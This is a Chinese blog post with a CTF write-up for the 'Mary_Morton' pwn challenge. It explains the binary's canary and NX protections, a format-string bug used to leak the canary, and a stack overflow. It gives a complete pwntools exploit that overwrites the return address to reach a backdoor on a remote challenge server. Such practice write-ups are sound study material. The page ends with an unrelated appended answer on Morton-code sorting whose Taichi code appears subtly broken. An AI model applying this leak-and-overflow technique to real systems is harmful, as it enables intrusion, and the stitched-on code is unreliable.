攻防世界-Mary_Morton

最新推荐文章于 2022-12-19 22:12:33 发布
原创 最新推荐文章于 2022-12-19 22:12:33 发布 · 3.1k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文详细探讨了一种针对开启Canary保护的AMD64程序,如何通过格式化字符串漏洞泄露Canary值,并利用栈溢出进行攻击的方法。分析了函数sub_4008EB和sub_400960中的漏洞,确定了Canary偏移量,构造了payload来获取Canary并覆盖返回地址,最终实现远程代码执行。实验中使用了gdb进行动态分析,明确了利用步骤和payload构造过程。

检查文件信息

在这里插入图片描述

amd64-elf文件
开启了Canary保护
开启了NX保护

ida静态分析

在这里插入图片描述
进入到sub_4008EB函数 格式化字符串漏洞
在这里插入图片描述
另外进入到sub_400960()函数有栈溢出漏洞
在这里插入图片描述
在这里插入图片描述

但是有一点开启了Canary 那么我们可以通过 格式化字符串任意读 泄露Canary地址 然后利用这个地址来进行溢出漏洞的利用 栈分布如图
在这里插入图片描述
而我们知道 v2就是用来储存canary的值的变量
而buf 大小位0x90
v2的大小位 0x8
覆盖return addr,需要0x90-0x8=0x88大小去覆盖,然后放上canary的值,0覆盖ebp,最后返回地址改为system的返回地址既可以

在这里插入图片描述
但是我们要确定偏移地址
所以我们用gdb确定偏移地址是6位
但是因为是amd64位
所以有8个寄存器来存值
继而
偏移量为 0x88/0x8 = 0x11 也就是17
那么 17+6 = 23就是canary的值
格式化 payload = ‘%23$p’
在这里插入图片描述

exp

#_*_coding:utf-8_*_
from pwn import *
import sys
context.log_level = 'debug'
ip = '111.200.241.244'
port = 60960
if sys.argv[1] == 'remote':
    io = remote(ip,port)
    #elf = ELF('./Mary_Morton')
else:
    io = process('./Mary_Morton')
    #elf = ELF('./Mary_Morton')

#buf ---> (0x90 - 0x8) / 0x8 = 0x11  |||  0x11+6
io.recvuntil("Select your weapon ")
io.sendline("2")
system_addr = 0x004008DA
payload = "%23$p"
io.sendline(payload)
io.recvuntil("0x")
canary_addr = int(io.recv(16),16)
print(hex(canary_addr))
io.recvuntil("3. Exit the battle ")
io.sendline("1")
payload = "a" * 0x88 + p64(canary_addr)+p64(0)+p64(system_addr)
io.sendline(payload)
io.interactive()
攻防世界 Mary_Morton
10-07 379
1.题目 2.IDA分析 3.流程分析
攻防世界——进阶PWN:Mary_Morton
baidu_36110484的博客
06-14 490
0x01源码分析 今天做了一道PWN题,考察了格式化字符串漏洞和绕过canary的栈溢出。比较基础,但是还是有值得记录的地方。 checksec查看,64位程序,开启了canary和栈不可执行。拖进IDA里,看到源码逻辑还是比较简单的。存在一个格式化字符串漏洞还有一个栈溢出。还有一个后门函数0x4008DA。 0x02 格式化字符串漏洞 先用老脚本看一下格式化串的相对偏移。 #search_offset.py #encoding:utf-8 from pwn import * context.log_le
攻防世界)(pwn)mary_mroton
PLpa的博客
07-20 937
经过一段时间的研究,终于接触到Canary了,不容易啊 拿到本题查看保护 开了NX和Canary两种栈保护,我们运行一下出现,看一下程序逻辑: 根据我们对英语强大的理解 (翻译软件的腻量)我们可以看到1标题是栈溢出漏洞函数,2是格式字符串漏洞函数,3为退出,既然他都告诉我们了,我们也不用客气直接用就可以了。 我们可以用格式字符串漏洞泄露Canary的值,然后再进行简单的栈溢出,把Canary填...
攻防世界pwn--Mary_Morton
YANG12345_6的博客
11-16 2349
攻防世界pwn–Mary_Morton file 一下,查看文件属性 checksec一下,查看保护措施 开了canary,在调用函数的时候会在栈上设置一个标志,标志的位置: EIP EBP canary logol ··· 栈的其他内容 开了NX,栈不可执行。 运行一下 ida查看其反汇编代码 在ida里看到有system函数: 地址:0x4008DA gdb调试,查看格式化字符串参数的位置 第六个位置 查看有关栈溢出的函数: 可以利用的栈溢出的buf的位置:rbp
攻防世界 Pwn Mary_Morton
MrTreebook的博客
12-05 1065
攻防世界 Pwn Mary_Morton1.题目下载地址2.checksec看一下保护3.IDA分析3.1.main函数3.2. sub_400960()3.3. sub_4008EB()3.4.4.gdb动态调试4.1.计算溢出量5.exp 1.题目下载地址 点击下载题目 2.checksec看一下保护 开启了canary,没开PIE 大概率有后门函数,应该不是很难的题 3.IDA分析 3.1.main函数 puts("Welcome to the battle ! "); puts("[Great
攻防世界pwn-Mary_Morton
qq_41168609的博客
01-04 367
题目 1、文件分析 64位的程序,并且开启了NX和Canary,还有Partial RELRO,got表有写权限 执行文件看流程 使用IDA进行分析,发现存在两处漏洞,字符串漏洞和栈溢出漏洞 通过搜索,存在后门函数 2、解题思路: 首先利用字符串漏洞,获取canary的值,绕过Canary保护 利用栈溢出漏洞,执行后门函数,获取到flag 3、获取canary值 计算偏移地址 canary的值就是var_8,我们需要获取var_8的值,栈溢出时保证该值不改变就可以绕过canary保护。 (1
4.pwn入门新手做攻防世界Mary_Morton (stack canary与绕过的思路)
qiudalaojiao的博客
02-14 693
canary 通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖ebp、eip 等,从而达到劫持控制流的目的。然而stack canary这一技术的应用使得这种利用手段变得难以实 现。。这个概念应用在栈保护上则是在初始化一个栈帧时在栈底设置一个随机的canary值,栈帧销毁前 测试比较该值是否“死掉”,即是否被改变,若被改变则说明栈溢出发生,程序走另一个流程结束,以免漏洞利...
攻防世界Mary_Morton
像初雪一样自由洒落
02-16 998
64位程序,开启了canary和nx保护 执行以下,效果如下: 有提示: 输入1那块存在栈溢出 输入2那块存在格式化字符串漏洞 拖到ida看一下 main函数: 栈溢出的函数: 有canary保护,根据程序可以看出,v2应该就是canary的值,一开始,将_readfsqword(0x28u)的值给v2,后来又和v2做异或操作,只有v2与它还相等,...
2019.10.10攻防世界 Mary_Morton
DSR446的博客
10-10 399
根据索引rbp提供的信息,我们知道,canary位置距离rbp为0x8,而我们的输入参数距离rbp为0x90。且这是一个64位程序。我们可以计算canary的偏移 = 6(6个寄存器)+(0x90-0x8)/8 = 23 :这里子所以减0x8是减的rbp。 【注】:这个程序缺少符号表且没有开PIE,所以我们在下断点的到时候通过在ida中找相应的地址,不用加上程序的加载地址。 最后的 ...
攻防世界pwn——Mary_Morton
qq_62076255的博客
12-19 280
做题记录
XCTF攻防世界高手mary_morton
weixin_45948183的博客
03-24 398
格式化字符串泄露canary,栈溢出 从函数执行就可以看出,一个格式化字符串啊漏洞,一个栈溢出漏洞 checksec了一下有canary的保护,开启了canary,就不能直接利用栈溢出覆盖返回地址,通过通过格式化字符串漏洞泄露canary的值,然后再进行栈溢出的覆盖 buf在rbp-90h,v2在rbp-8h,canary与我们输入参数的偏移为0x90 - 8 = 0x88所以,覆盖返回地址的话...
[攻防世界 pwn]——Mary_Morton
Y_peak的博客
02-20 313
[攻防世界 pwn]——Mary_Morton 题目地址: https://adworld.xctf.org.cn/ 题目: checksec看下,64位还开启了NX和canary保护。(一般开启canary保护,都有格式化字符串漏洞) 在IDA中看看, 果然有格式化字符串漏洞 仔细看看代码会发现, 这个是个死循环, 1 里面有栈溢出, 2里面有格式化字符串漏洞, 3是退出。 我们可以先利用格式化字符串的漏洞, 泄露出canary, 然后就可以利用栈溢出修改返回地址了。 最近我学了一个新的
攻防世界高手进阶区 ——Mary_Morton
weixin_62675330的博客
02-26 4202
攻防世界高手进阶区 ——Mary_Morton 不容易呀,这都已经是第七题了,继续加油! 一,老规矩,先分析一下文件 checksec一下 发现开启了栈溢出,可能这个题就是学习栈溢出漏洞绕过的。 运行一下 告诉了存在栈溢出漏洞和格式化字符串漏洞。 file文件 ┌──(root💀kali)-[/home/…/面/ctf_workstation/Offensive_and_defensive_world/Mary_Morton] └─# file Mary_Morton
攻防世界Mary_Morton wp
苗_的博客
10-13 396
首先查看他的保护机制:(checksec) 有canary保护 然后我们拖进ida发现两处溢出点: 看一下流程图和汇编可以知道readsqword这个地方有canary保护,只有 rax 和fs:28h 两个值相等的时候 才能跳转到返回值,反之则调用stack_chk_fail 找到后门函数 思路:将两个漏洞结合利用,首先利用字符串漏洞,泄露出canary的值,然后在函数要返回的时候再填回去,之后利用栈溢出,让其返回到后门函数 根据程序可以看出,v2应该就是canary的..
XCTF-攻防世界CTF平台-PWN类——1、Mary_Morton(格式化字符串漏洞、缓冲区溢出漏洞)
Onlyone_1314的博客
09-09 1827
目录标题一级目录二级目录1、查看程序基本信息2、反编译程序3、攻击思路(1)先利用功能2格式化字符串漏洞(2)找到功能1的sub_400960()函数返回地址的位置方法二 一级目录 二级目录 1、查看程序基本信息 Mary_Morton程序,先用file查看: Linux下64位的ELF文件 再用checksec查看 程序开启了Partial RELRO、NX和Canary,没有PIE。程序开启了canary,就不能直接利用栈溢出覆盖返回地址了。因为在初始化一个栈帧时在栈底(stack overflow
mary_morton
pppp974的博客
07-22 1174
mary_morton 这道题开启了canary保护,大概说一下题目,就是让你选择漏洞一个格式化字符漏洞还有一个就是栈溢出,这道题思路就是通过格式化字符漏洞泄露出cannary的值,然后进行栈溢出,后门题目已经给了。 来算算偏移量吧,buf为rbp-90h,canary就是v2为rbp-8h,所以偏移量为88h,然后在算一算格式化字符与Buf的偏移量就可以算出要多少字节来进行泄露了。调了一下,输...
ASIS-CTF-Finals-2017 Mary_Morton
qq_41071646的博客
01-11 1406
讲道理 这个 其实 感觉有两个方法  两种方法 都要调用一下    第一个  printf函数      第一个是 我们第一个可以    用printf  然后hook掉got的printf  不知道好不好实现  自己搜索了 资料 也没有发现  第二个 就是观察栈了  。。。。。。。 这里有个保护   就是  readfsqword  在 ida 的f5看的不是很清楚 我们 看 汇编窗...
Mary_Morton
weixin_46711318的博客
08-19 251
之前有讲到canary的原理,这道题就用到了。 checksec ida 可以看到scanf是我们可以利用的格式化字符串漏洞,因此我们可以确认偏移了6个字节 而v2其实就是canary,通过观察buf所在的栈,发现偏移了0x88,那么就可以开始写代码了。 代码 from pwn import* s=remote('220.249.52.133',48752) sys=0x4008de s.recvuntil('battle') s.sendline('2') s.sendline('%23$p')
对象 0: 坐标(1, 1) -> Morton码: 0000000000000011 (0x3) 对象 1: 坐标(2, 8) -> Morton码: 0000000010000100 (0x84) 对象 2: 坐标(7, 3) -> Morton码: 0000000000011111 (0x1f) 对象 3: 坐标(6, 6) -> Morton码: 0000000000111100 (0x3c) 对象 4: 坐标(4, 4) -> Morton码: 0000000000110000 (0x30) 对象 5: 坐标(9, 9) -> Morton码: 0000000011000011 (0xc3) 对象 0: 坐标(1, 1) -> Morton码: 0000000000000011 (0x3) 对象 1: 坐标(7, 3) -> Morton码: 0000000000011111 (0x1f) 对象 2: 坐标(4, 4) -> Morton码: 0000000000110000 (0x30) 对象 0: 坐标(1, 1) -> Morton码: 0000000000000011 (0x3) 对象 0: 坐标(7, 3) -> Morton码: 0000000000011111 (0x1f) 对象 1: 坐标(4, 4) -> Morton码: 0000000000110000 (0x30) 对象 0: 坐标(7, 3) -> Morton码: 0000000000011111 (0x1f) 对象 0: 坐标(4, 4) -> Morton码: 0000000000110000 (0x30) 对象 0: 坐标(6, 6) -> Morton码: 0000000000111100 (0x3c) 对象 1: 坐标(2, 8) -> Morton码: 0000000010000100 (0x84) 对象 2: 坐标(9, 9) -> Morton码: 0000000011000011 (0xc3) 对象 0: 坐标(6, 6) -> Morton码: 0000000000111100 (0x3c) 对象 0: 坐标(2, 8) -> Morton码: 0000000010000100 (0x84) 对象 1: 坐标(9, 9) -> Morton码: 0000000011000011 (0xc3) 对象 0: 坐标(2, 8) -> Morton码: 0000000010000100 (0x84) 对象 0: 坐标(9, 9) -> Morton码: 0000000011000011 (0xc3) 如何排序上述morton编码后的结果,得到正确的bvh树
最新发布
11-05
要对给定的Morton编码结果进行排序以构建正确的BVH(Bounding Volume Hierarchy)树,可使用基数排序(Radix Sort)。Morton编码(又称Z - order曲线)将3D空间坐标映射到1D线性空间,能保持空间局部性,这为排序提供了基础,排序后的结果可用于构建BVH树。 以下是使用基数排序对Morton编码结果排序的示例代码,结合引用[1]中的Morton编码计算过程,代码如下: ```python import taichi as ti ti.init(arch=ti.cpu) class BVHBuilder: def __init__(self, n_batches, n_aabbs): self.n_batches = n_batches self.n_aabbs = n_aabbs self.aabb_centers = ti.Vector.field(3, dtype=ti.f32, shape=(n_batches, n_aabbs)) self.aabb_min = ti.Vector.field(3, dtype=ti.f32, shape=(n_batches, n_aabbs)) self.scale = ti.field(dtype=ti.f32, shape=(n_batches)) self.morton_codes = ti.Vector.field(2, dtype=ti.u32, shape=(n_batches, n_aabbs)) @ti.kernel def compute_morton_codes(self): for i_b, i_a in ti.ndrange(self.n_batches, self.n_aabbs): center = self.aabb_centers[i_b, i_a] - self.aabb_min[i_b] scaled_center = center * self.scale[i_b] # 将坐标缩放到10位整数范围[0, 1024) morton_code_x = ti.floor(scaled_center[0] * 1023.0, dtype=ti.u32) morton_code_y = ti.floor(scaled_center[1] * 1023.0, dtype=ti.u32) morton_code_z = ti.floor(scaled_center[2] * 1023.0, dtype=ti.u32) # 位扩展算法 morton_code_x = self.expand_bits(morton_code_x) morton_code_y = self.expand_bits(morton_code_y) morton_code_z = self.expand_bits(morton_code_z) # 组合成最终的Morton编码 morton_code = (morton_code_x << 2) | (morton_code_y << 1) | morton_code_z self.morton_codes[i_b, i_a] = ti.Vector([morton_code, i_a], dt=ti.u32) @ti.func def expand_bits(self, v): v = (v * 0x00010001) & 0xFF0000FF v = (v * 0x00000101) & 0x0F00F00F v = (v * 0x00000011) & 0xC30C30C3 v = (v * 0x00000005) & 0x49249249 return v # 基数排序函数 @ti.kernel def radix_sort_morton_codes(self): temp = ti.Vector.field(2, dtype=ti.u32, shape=(self.n_batches, self.n_aabbs)) for i_b in range(self.n_batches): for shift in range(32): count_0 = 0 count_1 = 0 for i_a in range(self.n_aabbs): bit = (self.morton_codes[i_b, i_a][0] >> shift) & 1 if bit == 0: count_0 += 1 index_0 = 0 index_1 = count_0 for i_a in range(self.n_aabbs): bit = (self.morton_codes[i_b, i_a][0] >> shift) & 1 if bit == 0: temp[i_b, index_0] = self.morton_codes[i_b, i_a] index_0 += 1 else: temp[i_b, index_1] = self.morton_codes[i_b, i_a] index_1 += 1 for i_a in range(self.n_aabbs): self.morton_codes[i_b, i_a] = temp[i_b, i_a] # 示例使用 n_batches = 1 n_aabbs = 10 bvh_builder = BVHBuilder(n_batches, n_aabbs) # 这里需要初始化 aabb_centers, aabb_min, scale # 示例初始化 for i_b in range(n_batches): for i_a in range(n_aabbs): bvh_builder.aabb_centers[i_b, i_a] = ti.Vector([i_a * 0.1, i_a * 0.2, i_a * 0.3]) bvh_builder.aabb_min[i_b] = ti.Vector([0.0, 0.0, 0.0]) bvh_builder.scale[i_b] = 1.0 bvh_builder.compute_morton_codes() bvh_builder.radix_sort_morton_codes() ``` 在上述代码中,`compute_morton_codes` 函数用于计算Morton编码,`radix_sort_morton_codes` 函数用于对Morton编码结果进行基数排序。基数排序通过逐位比较Morton编码,将编码结果按位的0和1进行分类,最终得到排序好的Morton编码结果。排序后的Morton编码可用于构建正确的BVH树,例如根据排序结果划分图元,并行创建LBVH(引用[2])。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值